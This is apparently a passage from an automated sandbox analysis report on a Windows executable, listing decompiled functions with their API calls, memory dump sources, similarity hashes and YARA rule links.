                                                                                                                                                                          Function 004585AD, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 82libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004585B7
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(Ntdll.dll,NtQueryInformationProcess,?,00000400,?,000004A0,0045859B,00000000,?,0000006C,0045932E,00457D82,?,?), ref: 004585E7
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004585EE
                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,0000006C,0045932E,00457D82,?,?), ref: 0045861A
                                                                                                                                                                          • _memset.LIBCMT ref: 0045863F
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorFreeLastString$AddressH_prolog3_HandleModuleOpenProcProcess_memset
                                                                                                                                                                          • String ID: NtQueryInformationProcess$Ntdll.dll
                                                                                                                                                                          • API String ID: 954382961-801751246
                                                                                                                                                                          • Opcode ID: 6997806a9d65a949e01eb162f215cba3cbc26f433b5275aa6d98ccda77f9d1fc
                                                                                                                                                                          • Instruction ID: 1d96a9faa84c70bb65eae72cff8038878086398d6ba70314698192f48b1149dd
                                                                                                                                                                          • Opcode Fuzzy Hash: 6997806a9d65a949e01eb162f215cba3cbc26f433b5275aa6d98ccda77f9d1fc
                                                                                                                                                                          • Instruction Fuzzy Hash: BD3130B19002189BDB20DB60CD45BDEB778AF44309F4044EAE709B6182EF745F888F5D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045D8D6, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 80registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000), ref: 0045D932
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,ProxyEnable,00000000,00000000,?,?,?,00000000), ref: 0045D96D
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,AutoConfigURL,00000000,00000000,?,00000004,?,00000000), ref: 0045D9A7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: QueryValue$Open
                                                                                                                                                                          • String ID: AutoConfigURL$HsG$ProxyEnable$Software\Microsoft\Windows\CurrentVersion\Internet Settings
                                                                                                                                                                          • API String ID: 1606891134-3110392506
                                                                                                                                                                          • Opcode ID: f76b65e0bd2dd4ddfda23fe7936a0c3f93a00054631ae9e4838d09ad72185a35
                                                                                                                                                                          • Instruction ID: 99f1541a93d5bc8e6f4713b5d159c73875d6a1032d0269eaf3256a785e053f1f
                                                                                                                                                                          • Opcode Fuzzy Hash: f76b65e0bd2dd4ddfda23fe7936a0c3f93a00054631ae9e4838d09ad72185a35
                                                                                                                                                                          • Instruction Fuzzy Hash: 8E312EB1900229ABDB20DF65CC50BAEB7F8BF48710F0480EAE549E2151DE75AE84CFD4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0042A7B1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042A7BB
                                                                                                                                                                          • _memset.LIBCMT ref: 0042A7DE
                                                                                                                                                                            • Part of subcall function 00401500: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00401528
                                                                                                                                                                            • Part of subcall function 00435541: __EH_prolog3.LIBCMT ref: 00435548
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0042A844
                                                                                                                                                                          • lstrcatW.KERNEL32(?," /%), ref: 0042A86B
                                                                                                                                                                          • _wcschr.LIBCMT ref: 0042A876
                                                                                                                                                                          • lstrcatW.KERNEL32(?,00000000), ref: 0042A889
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcat$H_prolog3H_prolog3_QueryValue_memset_wcschrlstrcpy
                                                                                                                                                                          • String ID: " /%
                                                                                                                                                                          • API String ID: 2854241388-1244271203
                                                                                                                                                                          • Opcode ID: 9b275de08da438dc3211ce398686df716d0e94bdb46c2609f1856654a591cda9
                                                                                                                                                                          • Instruction ID: fe3daca82713acf34b7e5062739fcf429647a014a12d9eeaddd9f0ff7e8b5574
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b275de08da438dc3211ce398686df716d0e94bdb46c2609f1856654a591cda9
                                                                                                                                                                          • Instruction Fuzzy Hash: 6A2183B1A0021C6BDB10EBA1DC45BAE73ECBF48314F4445ABB549E7191EF34DA84CB99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456F11, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 52libraryloadertimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetProcessId,00000000,00457D82,?,00456AF6,00000000,?,?,?,?,?,0000006C,0045932E,00457D82,?), ref: 00456F32
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456F39
                                                                                                                                                                          • OpenProcess.KERNEL32(001FFFFF,00000001,?,00000000,00000000,00457D82,?,00456AF6,00000000,?,?,?,?,?,0000006C,0045932E), ref: 00456F59
                                                                                                                                                                          • GetProcessTimes.KERNEL32(00457D82,0045932E,0000006C,?,?,00000000,00000000,00457D82,?,00456AF6,00000000,?,?,?,?,?), ref: 00456F72
                                                                                                                                                                          • CloseHandle.KERNEL32(00457D82,?,00456AF6,00000000,?,?,?,?,?,0000006C,0045932E,00457D82,?,?), ref: 00456F7F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleProcess$AddressCloseModuleOpenProcTimes
                                                                                                                                                                          • String ID: GetProcessId$kernel32.dll
                                                                                                                                                                          • API String ID: 4254294609-399901964
                                                                                                                                                                          • Opcode ID: eb6dbfdf088b1e83ff297b3a3ca3ce33eb1af7881b601c196dd44363e0f300e2
                                                                                                                                                                          • Instruction ID: 3bb6880609d086f252c8b8612adda8e9d632f1719ee08a7ef26f869c023d6a77
                                                                                                                                                                          • Opcode Fuzzy Hash: eb6dbfdf088b1e83ff297b3a3ca3ce33eb1af7881b601c196dd44363e0f300e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 0001D433A416257B8B221F64BC089AB3B59EE457A339A0126FD18E3241DB24CC0546A8
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004590C1, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 004590C8
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,RemoveDirectoryW,00000004,00455C3A), ref: 004590DD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004590E4
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00459120
                                                                                                                                                                            • Part of subcall function 004591F0: __EH_prolog3_GS.LIBCMT ref: 004591F7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3$AddressH_prolog3_HandleModuleProc
                                                                                                                                                                          • String ID: HsG$RemoveDirectoryW$kernel32.dll
                                                                                                                                                                          • API String ID: 2400663618-2330775976
                                                                                                                                                                          • Opcode ID: ac6e3401959d509525022dd2fb37bc30ebed1f928715c3bcee9a6f866b30e3e5
                                                                                                                                                                          • Instruction ID: 52146a99c4b7991de24ae616d7d40cf8f25eec4746e0f0e0dbe13586e44e4ecb
                                                                                                                                                                          • Opcode Fuzzy Hash: ac6e3401959d509525022dd2fb37bc30ebed1f928715c3bcee9a6f866b30e3e5
                                                                                                                                                                          • Instruction Fuzzy Hash: E6F0D1B2500615EBCF15AFB58C4D69E37A4AB04316F91812EFC09DA242DB78CA08C79C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00455623, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0045562A
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteFileW,00000004,0045570C,0000000A,00000000,00000000), ref: 0045563F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00455646
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00455682
                                                                                                                                                                            • Part of subcall function 004591F0: __EH_prolog3_GS.LIBCMT ref: 004591F7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3$AddressH_prolog3_HandleModuleProc
                                                                                                                                                                          • String ID: DeleteFileW$HsG$kernel32.dll
                                                                                                                                                                          • API String ID: 2400663618-626139012
                                                                                                                                                                          • Opcode ID: c33d8a81dedb9f9bf1ac2fdb8a3483f8383d137e09e23b1d3ee02cb5ced63bad
                                                                                                                                                                          • Instruction ID: 5764dd03317634f981955eb4ec97349bd123db5dac9be347af981987845c21eb
                                                                                                                                                                          • Opcode Fuzzy Hash: c33d8a81dedb9f9bf1ac2fdb8a3483f8383d137e09e23b1d3ee02cb5ced63bad
                                                                                                                                                                          • Instruction Fuzzy Hash: D1F081B2500605EBCF11AFB58C5D6AE37A4AB04316B91812EFC0DDA252DB7CCA08C79D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041793C, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 27COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: Wiz$Inst$allS$ard$d$hiel
                                                                                                                                                                          • API String ID: 2427045233-3898594558
                                                                                                                                                                          • Opcode ID: 0bc5e367764efd8d6fb1eabef9b0cfa4a2598a203853fea0cedc24ba45cf0a9d
                                                                                                                                                                          • Instruction ID: ccdbbe702f1b6c37de8d7788d4c37eabaf773f4e9197fdd8d90e04b5751dc522
                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc5e367764efd8d6fb1eabef9b0cfa4a2598a203853fea0cedc24ba45cf0a9d
                                                                                                                                                                          • Instruction Fuzzy Hash: 89F017B1D0421CABDF01DF96C9816DEBBB4BF08704F94501EE544BB341C7B99B498BA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0044CBD2, Relevance: 12.2, APIs: 8, Instructions: 219COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __lock.LIBCMT ref: 0044CBE0
                                                                                                                                                                            • Part of subcall function 0044DBCA: __mtinitlocknum.LIBCMT ref: 0044DBDC
                                                                                                                                                                            • Part of subcall function 0044DBCA: EnterCriticalSection.KERNEL32(?,?,00447A09,0000000D,00497E60,0000000C,00442F17,?,?,00443311,?,?), ref: 0044DBF5
                                                                                                                                                                            • Part of subcall function 00445DCF: __calloc_impl.LIBCMT ref: 00445DDE
                                                                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0044CC0C
                                                                                                                                                                          • GetStartupInfoW.KERNEL32(?,00497EC0,00000064,00445157,00497C10,00000014), ref: 0044CC65
                                                                                                                                                                          • GetFileType.KERNEL32(00000001), ref: 0044CCF7
                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0044CD30
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalSection$CallCountEnterFileFilterFunc@8InfoInitializeSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2424608112-0
                                                                                                                                                                          • Opcode ID: 1238f08f00301191b9566f8d46c47e618392ed4d23cb94ebf59699c6c831921c
                                                                                                                                                                          • Instruction ID: 343f0ee27ecc99cb7b2b4c160810ffe1b5a635ce004eae2e11f8e9c4aa7a3975
                                                                                                                                                                          • Opcode Fuzzy Hash: 1238f08f00301191b9566f8d46c47e618392ed4d23cb94ebf59699c6c831921c
                                                                                                                                                                          • Instruction Fuzzy Hash: E881C870D067458FEB54CF68C8C45A9BFF0AF06324B28466ED4AAA73D1C7389843CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0045DC12, Relevance: 12.2, APIs: 8, Instructions: 163COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(00000003,00000000,00000002,00000000,00000003,00000000,00000000,00000000), ref: 0045DC6B
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0045DC73
                                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 0045DC83
                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 0045DCD6
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0045DCE4
                                                                                                                                                                          • __alldvrm.LIBCMT ref: 0045DD51
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045DD68
                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045DD8D
                                                                                                                                                                            • Part of subcall function 0045DF88: GetTickCount.KERNEL32 ref: 0045DF97
                                                                                                                                                                            • Part of subcall function 0045DF88: GetTickCount.KERNEL32 ref: 0045DFC0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountTick$CounterPerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$EventReset__alldvrm
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3317835756-0
                                                                                                                                                                          • Opcode ID: 4e44423a90849df83373dcd05dddda67934b70f1da7590044fb4c75f4e2ace33
                                                                                                                                                                          • Instruction ID: 843ed6ac573392e146f2ce9ae66c149fe619aa4da3621ee006800d0791e6d08f
                                                                                                                                                                          • Opcode Fuzzy Hash: 4e44423a90849df83373dcd05dddda67934b70f1da7590044fb4c75f4e2ace33
                                                                                                                                                                          • Instruction Fuzzy Hash: C1515D71A00704AFDB21DFA5C885BABB7F5FF84316F10882EE94AD6251D778A849CF14
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0046077A, Relevance: 12.2, APIs: 8, Instructions: 150COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memmove$H_prolog3__memset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 838622107-0
                                                                                                                                                                          • Opcode ID: b8a9b5079bc545baaf57042b9e392e1e3feb8407798a3a275a43647f3d94c93f
                                                                                                                                                                          • Instruction ID: 08243c99e99c3c215ea443f3f4074a6b1d047b6ee25c0b09c90066e49b80c567
                                                                                                                                                                          • Opcode Fuzzy Hash: b8a9b5079bc545baaf57042b9e392e1e3feb8407798a3a275a43647f3d94c93f
                                                                                                                                                                          • Instruction Fuzzy Hash: 225106B19003029FDF649F21D982AA677B4FF14315F2045AFE889AA193F338DA91CF55
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00423A84, Relevance: 12.2, APIs: 8, Instructions: 150fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00423AD9
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00423AEC
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00423B2D
                                                                                                                                                                          • _memmove.LIBCMT ref: 00423B93
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,00000000,00002800,?,00000000,?,?,00000000,00002800), ref: 00423BC2
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00423BCC
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00423C08
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,00002800), ref: 00423CA7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
